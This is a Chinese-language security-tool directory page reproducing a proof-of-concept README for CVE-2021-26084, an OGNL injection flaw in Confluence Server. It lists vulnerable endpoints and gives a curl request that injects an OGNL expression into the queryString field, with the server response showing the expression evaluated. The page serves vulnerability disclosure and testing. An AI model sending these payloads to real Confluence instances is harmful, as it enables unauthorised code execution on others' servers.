Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-26084_PoC | Kitploit
工具/GitHubGitHub/alt3kx/cve-2021-26084_poc
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

查看仓库
53164年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL 注入

存在一个 OGNL 注入漏洞,允许已验证用户(在某些情况下未验证用户)在 Confluence Server 或 Data Center 实例上执行任意代码。

poc

我寻找入口点和注入点的战斗 XD

战斗 (1)战斗 (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

最终 Confluence 入口点被利用

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

我的第一次手动检查:注意:已通过身份验证的用户

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

服务器响应:

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

参考:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

这里发布了一篇精彩的文章:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

一些非常有用的提示来自:
@wvuuuuuuuuuuuuu
@iamnoooob

作者

Alex Hernandez 又名 (@_alt3kx_)

下载工具